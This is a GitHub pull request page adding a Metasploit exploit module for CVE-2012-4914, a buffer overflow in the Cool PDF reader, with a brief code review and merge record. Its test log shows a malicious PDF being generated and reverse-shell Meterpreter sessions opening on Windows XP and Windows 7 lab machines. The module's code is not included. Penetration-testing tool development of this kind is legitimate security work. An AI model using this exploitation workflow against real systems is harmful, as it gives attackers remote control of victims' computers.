
added module for cve-2012-4914 #1610

Merged
merged 2 commits into from Mar 19, 2013

3 participants

@jvazquez-r7

Tested on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1

Vulnerable app can be downloaded from:

http://www.exploit-db.com/wp-content/themes/exploit/applications/29e2770f70e2ee702d2d60658024d976-CoolPDFReader.exe

msf  exploit(handler) > use exploit/windows/fileformat/coolpdf_image_stream_bof 
msf  exploit(coolpdf_image_stream_bof) > rexploit
[*] Reloading module...

[+] msf.pdf stored at /Users/juan/.msf4/local/msf.pdf
msf  exploit(coolpdf_image_stream_bof) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.136
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.136:1691) at 2013-03-17 21:09:39 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.136 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.130
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.130:49255) at 2013-03-17 21:10:29 +0100

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...


@zeroSteiner

I don't think these lines are necessary.

you're right, debug .... thanks ;)

@wchen-r7 merged commit 4aab1cc into rapid7:master Mar 19, 2013

1 check passed

default: The Travis build passed
@jvazquez-r7 deleted the jvazquez-r7:coolpdf_image_stream_bof branch Nov 18, 2014